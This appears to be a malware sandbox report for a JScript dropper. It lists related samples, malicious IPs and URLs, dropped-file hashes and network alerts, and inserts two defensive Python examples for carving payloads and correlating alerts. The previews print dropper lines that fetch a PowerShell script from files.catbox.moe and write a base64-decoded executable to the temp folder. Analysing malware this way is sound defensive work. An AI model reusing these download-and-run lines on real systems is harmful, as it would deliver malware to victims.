checkip.dyndns.com | JB#40044 Order.exe | Get hash | malicious | MassLogger RAT | Browse |
                                                                                                      • 132.226.247.73
                                                                                                      PO.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      • 193.122.6.168
                                                                                                      files.catbox.moec2.htaGet hashmaliciousRemcosBrowse
                                                                                                      • 108.181.20.35
                                                                                                      DHL AWB-documents.lnkGet hashmaliciousDivulge StealerBrowse
                                                                                                      • 108.181.20.35
                                                                                                      doc00290320092.jseGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                      • 108.181.20.35
                                                                                                      TT copy.jsGet hashmaliciousFormBookBrowse
                                                                                                      • 108.181.20.35
                                                                                                      z68scancopy.vbsGet hashmaliciousFormBookBrowse
                                                                                                      • 108.181.20.35
                                                                                                      2zirzlMVqX.batGet hashmaliciousXmrigBrowse
                                                                                                      • 108.181.20.35
                                                                                                      QwLii5vouB.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 108.181.20.35
                                                                                                      PO Huaruicarbon 98718.htmlGet hashmaliciousCorporateDataTheft, HTMLPhisherBrowse
                                                                                                      • 108.181.20.35
                                                                                                      5QnwxSJVyX.docGet hashmaliciousUnknownBrowse
                                                                                                      • 108.181.20.35
                                                                                                      file.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 108.181.20.35
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      ASN852CA6.elfGet hashmaliciousUnknownBrowse
                                                                                                      • 66.183.229.9
                                                                                                      sora.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                      • 161.188.161.80
                                                                                                      sora.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                      • 207.229.42.138
                                                                                                      miori.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                      • 50.93.119.87
                                                                                                      c2.htaGet hashmaliciousRemcosBrowse
                                                                                                      • 108.181.20.35
                                                                                                      miori.spc.elfGet hashmaliciousUnknownBrowse
                                                                                                      • 207.134.206.79
                                                                                                      miori.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                      • 173.182.249.54
                                                                                                      momo.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 154.5.112.131
                                                                                                      z0r0.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 50.99.231.33
                                                                                                      sHCznAai4a.batGet hashmaliciousUnknownBrowse
                                                                                                      • 108.181.20.35
                                                                                                      CLOUDFLARENETUS0V2JsCrGUB.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                      • 104.21.38.84
                                                                                                      https://boutiquedumonde.instawp.xyz/wp-content/themes/twentytwentyfive/envoidoclosa_toutdomaine/wetransfer/index.htmlGet hashmaliciousUnknownBrowse
                                                                                                      • 1.1.1.1
                                                                                                      drop1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                      • 172.67.74.152
                                                                                                      Fantazy.x86_64.elfGet hashmaliciousUnknownBrowse
                                                                                                      • 1.3.115.13
                                                                                                      https://sora-ai-download.com/Get hashmaliciousUnknownBrowse
                                                                                                      • 104.22.20.144
                                                                                                      ReIayMSG__polarisrx.com_#7107380109.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                                      • 104.18.11.207
                                                                                                      Appraisal-nation-Review_and_Signature_Request46074.pdfGet hashmaliciousUnknownBrowse
                                                                                                      • 104.26.5.30
                                                                                                      ReIayMSG__polarisrx.com_#6577807268.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                                      • 104.17.25.14
                                                                                                      Appraisal-nation-Review_and_Signature_Request46074.pdfGet hashmaliciousUnknownBrowse
                                                                                                      • 104.17.25.14
                                                                                                      QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 104.21.32.1
                                                                                                      VNPT-AS-VNVietnamPostsandTelecommunicationsVNPTVNtelnet.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                      • 203.162.81.0
                                                                                                      SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                                      • 222.255.236.245
                                                                                                      https://membership.garenaa.id.vn/css/greeting.jsp/index.htmlGet hashmaliciousUnknownBrowse
                                                                                                      • 203.162.56.72
                                                                                                      http://ff.members.gerane.vn/Get hashmaliciousUnknownBrowse
                                                                                                      • 203.162.56.72
                                                                                                      http://memberships.garenna.id.vn/css/hitcount.jspGet hashmaliciousUnknownBrowse
                                                                                                      • 203.162.56.72
                                                                                                      file.exeGet hashmaliciousSystemBCBrowse
                                                                                                      • 222.255.235.113
                                                                                                      Ng11aTxsp8.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                                      • 123.30.128.169
                                                                                                      52fkd1Rd8E.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 203.162.81.4
                                                                                                      UQqIEFBoFN.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 203.162.81.9
                                                                                                      DNTT-v3.1.xlsb.xlsxGet hashmaliciousUnknownBrowse
                                                                                                      • 222.255.103.91
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      54328bd36c14bd82ddaa0c04b25ed9adTepe - 20000000826476479.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      • 104.21.96.1
                                                                                                      Order_List.scr.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                      • 104.21.96.1
                                                                                                      Nuevo pedido.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 104.21.96.1
                                                                                                      CTM REQUEST-ETD JAN 22, 2024_pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      • 104.21.96.1
                                                                                                      Copy shipping docs PO EV1786 LY ECO PAK EV1.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 104.21.96.1
                                                                                                      Payment 01.08.25.pdf.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                      • 104.21.96.1
                                                                                                      December Reconciliation QuanKang.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 104.21.96.1
                                                                                                      JB#40044 Order.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      • 104.21.96.1
                                                                                                      PO.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      • 104.21.96.1
                                                                                                      BgroUcYHpy.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 104.21.96.1
                                                                                                      37f463bf4616ecd445d4a1937da06e19drop1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                      • 108.181.20.35
                                                                                                      DyM4yXX.exeGet hashmaliciousVidarBrowse
                                                                                                      • 108.181.20.35
                                                                                                      http://cipassoitalia.itGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                      • 108.181.20.35
                                                                                                      DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcosBrowse
                                                                                                      • 108.181.20.35
                                                                                                      xCnwCctDWC.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 108.181.20.35
                                                                                                      DLKs2Qeljg.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 108.181.20.35
                                                                                                      fuk7RfLrD3.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 108.181.20.35
                                                                                                      Ljrprfl3BH.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 108.181.20.35
                                                                                                      2362476847-83854387.07.exeGet hashmaliciousNitolBrowse
                                                                                                      • 108.181.20.35
                                                                                                      2362476847-83854387.07.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 108.181.20.35
                                                                                                      No context

Process: C:\Windows\System32\wscript.exe
File Type: ASCII text, with very long lines (65494), with CRLF line terminators
Category: dropped
Size (bytes): 186488
Entropy (8bit): 5.916802219473977
Encrypted: false
SSDEEP: 3072:NlbgeXDOEpoKxKjtT0eIfGUQteCmpqLtSX9bun6CPh+G6K45I:/bg6BKdtTfIfGZ4rpGsNbuL+xa
MD5: 32DA6EE3B90B2D2F694B8635DFA58459
SHA1: 9272EE959D8290D6F4095FD6525C7927B5C92DE0
SHA-256: 00A6CD51B0D8CA285EEA43383A0736A9C4B95ED381FB5607291D08DC9870E30F
SHA-512: BE827EEB5CB31C5126696577A54D52E26391EC843D36CBAB5C369C908ECA52115192DB73825C0FCEEFEABE5FE98B823545451CB7B6859998AF4325DA0CD1C173
Malicious: true
Reputation: low
Preview: $p=[IO.Path]::Combine($env:TEMP,"x.exe")..[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("…
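The preview above shows the second stage in one line: PowerShell decodes a base64 string and writes the result to %TEMP%\x.exe, which the report later identifies as a .NET assembly. The following script is an added example for triaging a dropper of that shape offline; it is not part of the Joe Sandbox report and not code from the sample. It carves every FromBase64String literal, checks for an MZ/PE header, hashes the payload, and reads data directory 14 (the CLR header) of the optional header to tell a managed assembly from native code. The dropper text and the minimal PE header it decodes are constructed here for the demonstration; the real blob was removed from the preview and is not reproduced.

```python
"""Carve base64-embedded PE payloads from a PowerShell dropper of the shape shown above."""
from __future__ import annotations

import base64
import hashlib
import re
import struct

# Argument of [Convert]::FromBase64String("...") as the dropper on this page uses it.
B64_CALL = re.compile(r'FromBase64String\(\s*"([A-Za-z0-9+/=\s]+)"\s*\)', re.IGNORECASE)


def pe_info(data: bytes) -> dict | None:
    """Return basic header facts when data starts with a PE image, else None."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        return None
    machine, nsections = struct.unpack_from("<HH", data, e_lfanew + 4)
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    opt = e_lfanew + 24
    if opt_size < 2 or opt + opt_size > len(data):
        return None
    magic = struct.unpack_from("<H", data, opt)[0]
    # Data directories begin at +96 (PE32) or +112 (PE32+); entry 14 is the CLR header.
    # A non-empty entry is what marks a file as a .NET assembly rather than native code.
    clr_off = opt + (96 if magic == 0x10B else 112) + 14 * 8
    managed = False
    if clr_off + 8 <= opt + opt_size:
        clr_rva, clr_size = struct.unpack_from("<II", data, clr_off)
        managed = clr_rva != 0 and clr_size != 0
    return {"machine": machine, "sections": nsections, "pe32plus": magic == 0x20B, "managed": managed}


def carve_payloads(script: str) -> list[dict]:
    """Decode every FromBase64String literal in the script and keep those that are PE files."""
    found = []
    for m in B64_CALL.finditer(script):
        blob = re.sub(r"\s+", "", m.group(1))
        try:
            data = base64.b64decode(blob, validate=True)
        except ValueError:  # binascii.Error subclasses ValueError
            continue
        info = pe_info(data)
        if info is None:
            continue
        info.update(size=len(data), sha256=hashlib.sha256(data).hexdigest(), offset=m.start(1))
        found.append(info)
    return found


def build_fake_pe(managed: bool) -> bytes:
    """Constructed test input: a minimal PE32 header, not a runnable program.

    Hypothetical bytes built for this example; nothing here comes from the real sample."""
    dos = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", 0x40)  # e_lfanew = 0x40
    # i386, 1 section, 224-byte optional header, EXECUTABLE_IMAGE | 32BIT_MACHINE
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)  # PE32 magic
    struct.pack_into("<I", opt, 92, 16)    # NumberOfRvaAndSizes
    if managed:
        struct.pack_into("<II", opt, 96 + 14 * 8, 0x2008, 0x48)  # CLR header directory entry
    return dos + b"PE\x00\x00" + coff + bytes(opt)


# Constructed dropper text mirroring the preview on this page, with the real base64
# blob replaced by the fake header above.
SAMPLE_DROPPER = (
    '$p=[IO.Path]::Combine($env:TEMP,"x.exe")\r\n'
    '[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("'
    + base64.b64encode(build_fake_pe(True)).decode()
    + '"))\r\n'
)

if __name__ == "__main__":
    for hit in carve_payloads(SAMPLE_DROPPER):
        print(hit)
```

Run it against the dropped .ps1 by reading the file into `carve_payloads`; the SHA-256 it reports for a carved PE is the value to compare with the dropped-file hashes further down the report. Scripts that split the blob across several string concatenations will not match the single-literal pattern and need the string joined first.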

Process: C:\Users\user\AppData\Local\Temp\x.exe
File Type: CSV text
Category: dropped
Size (bytes): 226
Entropy (8bit): 5.360398796477698
Encrypted: false
SSDEEP: 6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
MD5: 3A8957C6382192B71471BD14359D0B12
SHA1: 71B96C965B65A051E7E7D10F61BEBD8CCBB88587
SHA-256: 282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
SHA-512: 76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
Malicious: false
Reputation: high, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

Process: C:\Windows\System32\wscript.exe
File Type: ASCII text, with very long lines (65494), with CRLF line terminators
Category: dropped
Size (bytes): 186488
Entropy (8bit): 5.916802219473977
Encrypted: false
SSDEEP: 3072:NlbgeXDOEpoKxKjtT0eIfGUQteCmpqLtSX9bun6CPh+G6K45I:/bg6BKdtTfIfGZ4rpGsNbuL+xa
MD5: 32DA6EE3B90B2D2F694B8635DFA58459
SHA1: 9272EE959D8290D6F4095FD6525C7927B5C92DE0
SHA-256: 00A6CD51B0D8CA285EEA43383A0736A9C4B95ED381FB5607291D08DC9870E30F
SHA-512: BE827EEB5CB31C5126696577A54D52E26391EC843D36CBAB5C369C908ECA52115192DB73825C0FCEEFEABE5FE98B823545451CB7B6859998AF4325DA0CD1C173
Malicious: false
Preview: $p=[IO.Path]::Combine($env:TEMP,"x.exe")..[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("…

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 1.1940658735648508
Encrypted: false
SSDEEP: 3:NlllulDm0ll//Z:NllU6cl/
MD5: DA1F22117B9766A1F0220503765A5BA5
SHA1: D35597157EFE03AA1A88C1834DF8040B3DD3F3CB
SHA-256: BD022BFCBE39B4DA088DDE302258AE375AAFD6BDA4C7B39A97D80C8F92981C69
SHA-512: 520FA7879AB2A00C86D9982BB057E7D5E243F7FC15A12BA1C823901DC582D2444C76534E955413B0310B9EBD043400907FD412B88927DAD07A1278D3B667E3D9
Malicious: false
Preview: @...e.................................R..............@..........

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):139776
                                                                                                      Entropy (8bit):7.644817742072604
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:7tunZcvnVDr29cusZ67AJRDfmeTTlWhgnTf1qfUqnp07Kz7W:7tunZcvnVnB67UfmSimTfoMqnp07Kz
                                                                                                      MD5:9FB7455B1C6CB563FF7E58F422F3BC6E
                                                                                                      SHA1:B0EAAE8C4727FF2A6F0F288EA56D49E5B700C54A
                                                                                                      SHA-256:6E2D33CE0C4A7216F96AB98BCF2DBE18CDBF13A1C9BB011C52767A86858403B3
                                                                                                      SHA-512:702D9C99B0D63090531D77F3C6F251EA6D87179AC0616861EA70AB983B0101361C6DD90392B049AC8E4730B9626122380125C4740516C045CE21DB3743D05B18
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....w..........."...0..~...........`....... ....@.. ....................................`.....................................W....@...............................................................................`..................H............6Fd:c#.D.... ......................@....text....{.......|.................. ..`.rsrc........@......................@..@.............`...................... ..`.reloc............... ..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      File type:ASCII text, with CRLF line terminators
                                                                                                      Entropy (8bit):4.944630711745134
                                                                                                      TrID:
                                                                                                      • Digital Micrograph Script (4001/1) 100.00%
                                                                                                      File name:1C24TDP_000000029.jse
                                                                                                      File size:1'609 bytes
                                                                                                      MD5:ffb57c052a985d3e7b43502f4e07376c
                                                                                                      SHA1:fd80160aa4ab95c55fd0002b4705816c6c7fe1fd
                                                                                                      SHA256:2861bc7808cb4308c951499b8709ce15c8dd56e551183e5d75adf1a7b825fe07
                                                                                                      SHA512:4484980561782dfc6fda135fc0fb8d21fce22408502e8e03bd600bd3ec78e008a367ec443ee441f48d0eaf662e47b18c217586a15b315c653e12ac00c314d528
                                                                                                      SSDEEP:24:R3PsFtqKQkb+j6qk9UDPsZSWJpYjpMlUfu19cibuK5Ky9vbXcN0uK:R0Ftf6soWJpgu1zu6v7wA
                                                                                                      TLSH:6E318B1A591AE3391737A75B811BC258EBA2916B0A14C210F9CCC48CBF301BCCD75E8A
                                                                                                      File Content Preview:// Constants to avoid magic strings..var _a = "https://files.catbox.moe/jqxrkk.ps1";..var _b = "C:\\Temp\\dddddd.ps1";..var _c = "C:\\Temp";..var _d = 200;....// PowerShell execution policy and command..var _e = "PowerShell -NoProfile -ExecutionPolicy Rem
                                                                                                      Icon Hash:68d69b8bb6aa9a86
Timestamp                        SID      Signature                                          Severity  Source IP        Source Port  Dest IP          Dest Port  Protocol
2025-01-09T18:33:11.356574+0100  2827578  ETPRO MALWARE Likely Dropper Doc GET to .moe TLD   1         192.168.2.4      49730        108.181.20.35    443        TCP
2025-01-09T18:33:11.533811+0100  2018856  ET MALWARE Windows executable base64 encoded       1         108.181.20.35    443          192.168.2.4      49730      TCP
2025-01-09T18:33:19.821960+0100  2803274  ETPRO MALWARE Common Downloader Header Pattern UH  2         192.168.2.4      49731        132.226.247.73   80         TCP
2025-01-09T18:33:26.440288+0100  2803274  ETPRO MALWARE Common Downloader Header Pattern UH  2         192.168.2.4      49731        132.226.247.73   80         TCP
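The four alerts above fire on only two of the connections recorded in the TCP packet table that follows; the other two connections (to 104.21.96.1 on 443 and to 123.30.244.30 on 587) produce no signature hit at all. The Python below is an added example, not part of the Joe Sandbox report: it folds packet rows into client-to-server flows, attaches each alert to its flow by 4-tuple, and reports the flows that carry no IDS hit, calling out any that land on a mail-submission port. The alert rows and packet rows are copied from the two tables on this page (the packet list is a subset, one packet per direction per connection); the sandbox address 192.168.2.4 is taken from those rows; the WATCH_PORTS mapping, the verdict strings and every function name are this example's own assumptions.

```python
"""Correlate Suricata alerts with TCP flows from a sandbox packet table.

Added example for this report page. Data rows are copied from the page's
alert and packet tables; WATCH_PORTS and the triage rules are assumptions
of this example, not something the report states.
"""
from collections import OrderedDict

# Analysis host, as it appears in every packet row of the report.
SANDBOX_HOST = "192.168.2.4"

# Assumption: server ports worth flagging even when no IDS signature fired.
WATCH_PORTS = {25: "smtp", 465: "smtps", 587: "smtp-submission"}

# (timestamp, sid, signature, severity, src, sport, dst, dport, proto),
# copied from the Suricata alert table above.
ALERTS = [
    ("2025-01-09T18:33:11.356574+0100", 2827578,
     "ETPRO MALWARE Likely Dropper Doc GET to .moe TLD", 1,
     "192.168.2.4", 49730, "108.181.20.35", 443, "TCP"),
    ("2025-01-09T18:33:11.533811+0100", 2018856,
     "ET MALWARE Windows executable base64 encoded", 1,
     "108.181.20.35", 443, "192.168.2.4", 49730, "TCP"),
    ("2025-01-09T18:33:19.821960+0100", 2803274,
     "ETPRO MALWARE Common Downloader Header Pattern UH", 2,
     "192.168.2.4", 49731, "132.226.247.73", 80, "TCP"),
    ("2025-01-09T18:33:26.440288+0100", 2803274,
     "ETPRO MALWARE Common Downloader Header Pattern UH", 2,
     "192.168.2.4", 49731, "132.226.247.73", 80, "TCP"),
]

# (timestamp, sport, dport, src, dst): a subset of the TCP packet table,
# the first packet seen in each direction of every connection.
PACKETS = [
    ("Jan 9, 2025 18:33:10.283637047 CET", 49730, 443, "192.168.2.4", "108.181.20.35"),
    ("Jan 9, 2025 18:33:10.283706903 CET", 443, 49730, "108.181.20.35", "192.168.2.4"),
    ("Jan 9, 2025 18:33:18.866297960 CET", 49731, 80, "192.168.2.4", "132.226.247.73"),
    ("Jan 9, 2025 18:33:18.871141911 CET", 80, 49731, "132.226.247.73", "192.168.2.4"),
    ("Jan 9, 2025 18:33:19.799343109 CET", 49732, 443, "192.168.2.4", "104.21.96.1"),
    ("Jan 9, 2025 18:33:19.799387932 CET", 443, 49732, "104.21.96.1", "192.168.2.4"),
    ("Jan 9, 2025 18:33:27.135301113 CET", 49736, 587, "192.168.2.4", "123.30.244.30"),
    ("Jan 9, 2025 18:33:27.140080929 CET", 587, 49736, "123.30.244.30", "192.168.2.4"),
]


def flow_key(sport, dport, src, dst, local_host=SANDBOX_HOST):
    """Orient a packet as (client, client_port, server, server_port) so both
    directions of one connection share a key. The sandbox host is the client."""
    if src == local_host:
        return (src, sport, dst, dport)
    return (dst, dport, src, sport)


def build_flows(packets, local_host=SANDBOX_HOST):
    """Group packets into flows, keeping first-seen order and a packet count."""
    flows = OrderedDict()
    for ts, sport, dport, src, dst in packets:
        key = flow_key(sport, dport, src, dst, local_host)
        rec = flows.setdefault(
            key, {"first_seen": ts, "last_seen": ts, "packets": 0, "sids": set()})
        rec["last_seen"] = ts
        rec["packets"] += 1
    return flows


def attach_alerts(flows, alerts, local_host=SANDBOX_HOST):
    """Attach each alert's SID to the flow it fired on. Returns the SIDs whose
    4-tuple matches no flow, which means the packet table is incomplete."""
    unmatched = []
    for _ts, sid, _sig, _sev, src, sport, dst, dport, _proto in alerts:
        key = flow_key(sport, dport, src, dst, local_host)
        if key in flows:
            flows[key]["sids"].add(sid)
        else:
            unmatched.append(sid)
    return unmatched


def triage(flows):
    """Return [(flow_key, verdict)]: alerted flows list their SIDs, silent flows
    to a watched port are named, everything else is plain 'no-ids-alert'."""
    verdicts = []
    for key, rec in flows.items():
        _client, _client_port, _server, server_port = key
        if rec["sids"]:
            verdict = "ids-alert:" + ",".join(str(s) for s in sorted(rec["sids"]))
        elif server_port in WATCH_PORTS:
            verdict = "no-ids-alert:" + WATCH_PORTS[server_port]
        else:
            verdict = "no-ids-alert"
        verdicts.append((key, verdict))
    return verdicts


if __name__ == "__main__":
    flows = build_flows(PACKETS)
    unmatched = attach_alerts(flows, ALERTS)
    for (client, cport, server, srv_port), verdict in triage(flows):
        print(f"{client}:{cport} -> {server}:{srv_port}  {verdict}")
    if unmatched:
        print("alerts with no matching flow:", unmatched)
```

Run as a script it prints one line per flow. On the report's data the connections to 108.181.20.35:443 and 132.226.247.73:80 carry their SIDs, the connection to 104.21.96.1:443 is reported as no-ids-alert, and the connection to 123.30.244.30:587 is reported as no-ids-alert:smtp-submission, which is the line an analyst would chase next, since signature-based alerting alone says nothing about it.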

Timestamp                           Source Port  Dest Port  Source IP        Dest IP
Jan 9, 2025 18:33:10.283637047 CET  49730        443        192.168.2.4      108.181.20.35
Jan 9, 2025 18:33:10.283706903 CET  443          49730      108.181.20.35    192.168.2.4
Jan 9, 2025 18:33:10.283787966 CET  49730        443        192.168.2.4      108.181.20.35
Jan 9, 2025 18:33:10.297008991 CET  49730        443        192.168.2.4      108.181.20.35
Jan 9, 2025 18:33:10.297033072 CET  443          49730      108.181.20.35    192.168.2.4
Jan 9, 2025 18:33:11.133873940 CET  443          49730      108.181.20.35    192.168.2.4
Jan 9, 2025 18:33:11.133946896 CET  49730        443        192.168.2.4      108.181.20.35
Jan 9, 2025 18:33:11.177464008 CET  49730        443        192.168.2.4      108.181.20.35
Jan 9, 2025 18:33:11.177503109 CET  443          49730      108.181.20.35    192.168.2.4
Jan 9, 2025 18:33:11.177829981 CET  443          49730      108.181.20.35    192.168.2.4
Jan 9, 2025 18:33:11.177898884 CET  49730        443        192.168.2.4      108.181.20.35
Jan 9, 2025 18:33:11.179719925 CET  49730        443        192.168.2.4      108.181.20.35
Jan 9, 2025 18:33:11.227330923 CET  443          49730      108.181.20.35    192.168.2.4
Jan 9, 2025 18:33:11.356633902 CET  443          49730      108.181.20.35    192.168.2.4
Jan 9, 2025 18:33:11.356666088 CET  443          49730      108.181.20.35    192.168.2.4
Jan 9, 2025 18:33:11.356702089 CET  443          49730      108.181.20.35    192.168.2.4
Jan 9, 2025 18:33:11.356915951 CET  49730        443        192.168.2.4      108.181.20.35
Jan 9, 2025 18:33:11.356915951 CET  49730        443        192.168.2.4      108.181.20.35
Jan 9, 2025 18:33:11.356955051 CET  443          49730      108.181.20.35    192.168.2.4
Jan 9, 2025 18:33:11.357004881 CET  49730        443        192.168.2.4      108.181.20.35
Jan 9, 2025 18:33:11.443341970 CET  443          49730      108.181.20.35    192.168.2.4
Jan 9, 2025 18:33:11.443377972 CET  443          49730      108.181.20.35    192.168.2.4
Jan 9, 2025 18:33:11.443432093 CET  49730        443        192.168.2.4      108.181.20.35
Jan 9, 2025 18:33:11.443461895 CET  443          49730      108.181.20.35    192.168.2.4
Jan 9, 2025 18:33:11.443486929 CET  49730        443        192.168.2.4      108.181.20.35
Jan 9, 2025 18:33:11.443511963 CET  49730        443        192.168.2.4      108.181.20.35
Jan 9, 2025 18:33:11.485450029 CET  443          49730      108.181.20.35    192.168.2.4
Jan 9, 2025 18:33:11.485490084 CET  443          49730      108.181.20.35    192.168.2.4
Jan 9, 2025 18:33:11.485538960 CET  49730        443        192.168.2.4      108.181.20.35
Jan 9, 2025 18:33:11.485555887 CET  443          49730      108.181.20.35    192.168.2.4
Jan 9, 2025 18:33:11.485579967 CET  49730        443        192.168.2.4      108.181.20.35
Jan 9, 2025 18:33:11.485600948 CET  49730        443        192.168.2.4      108.181.20.35
Jan 9, 2025 18:33:11.533849955 CET  443          49730      108.181.20.35    192.168.2.4
Jan 9, 2025 18:33:11.533878088 CET  443          49730      108.181.20.35    192.168.2.4
Jan 9, 2025 18:33:11.533937931 CET  49730        443        192.168.2.4      108.181.20.35
Jan 9, 2025 18:33:11.533967018 CET  443          49730      108.181.20.35    192.168.2.4
Jan 9, 2025 18:33:11.533993959 CET  49730        443        192.168.2.4      108.181.20.35
Jan 9, 2025 18:33:11.534001112 CET  49730        443        192.168.2.4      108.181.20.35
Jan 9, 2025 18:33:11.534854889 CET  443          49730      108.181.20.35    192.168.2.4
Jan 9, 2025 18:33:11.534873009 CET  443          49730      108.181.20.35    192.168.2.4
Jan 9, 2025 18:33:11.534904957 CET  49730        443        192.168.2.4      108.181.20.35
Jan 9, 2025 18:33:11.534910917 CET  443          49730      108.181.20.35    192.168.2.4
Jan 9, 2025 18:33:11.534948111 CET  49730        443        192.168.2.4      108.181.20.35
Jan 9, 2025 18:33:11.536286116 CET  443          49730      108.181.20.35    192.168.2.4
Jan 9, 2025 18:33:11.536302090 CET  443          49730      108.181.20.35    192.168.2.4
Jan 9, 2025 18:33:11.536346912 CET  49730        443        192.168.2.4      108.181.20.35
Jan 9, 2025 18:33:11.536354065 CET  443          49730      108.181.20.35    192.168.2.4
Jan 9, 2025 18:33:11.536386013 CET  49730        443        192.168.2.4      108.181.20.35
Jan 9, 2025 18:33:11.623708010 CET  443          49730      108.181.20.35    192.168.2.4
Jan 9, 2025 18:33:11.623760939 CET  443          49730      108.181.20.35    192.168.2.4
Jan 9, 2025 18:33:11.623816013 CET  49730        443        192.168.2.4      108.181.20.35
Jan 9, 2025 18:33:11.623848915 CET  443          49730      108.181.20.35    192.168.2.4
Jan 9, 2025 18:33:11.623867035 CET  49730        443        192.168.2.4      108.181.20.35
Jan 9, 2025 18:33:11.623917103 CET  49730        443        192.168.2.4      108.181.20.35
Jan 9, 2025 18:33:11.624218941 CET  443          49730      108.181.20.35    192.168.2.4
Jan 9, 2025 18:33:11.624238968 CET  443          49730      108.181.20.35    192.168.2.4
Jan 9, 2025 18:33:11.624303102 CET  49730        443        192.168.2.4      108.181.20.35
Jan 9, 2025 18:33:11.624315023 CET  443          49730      108.181.20.35    192.168.2.4
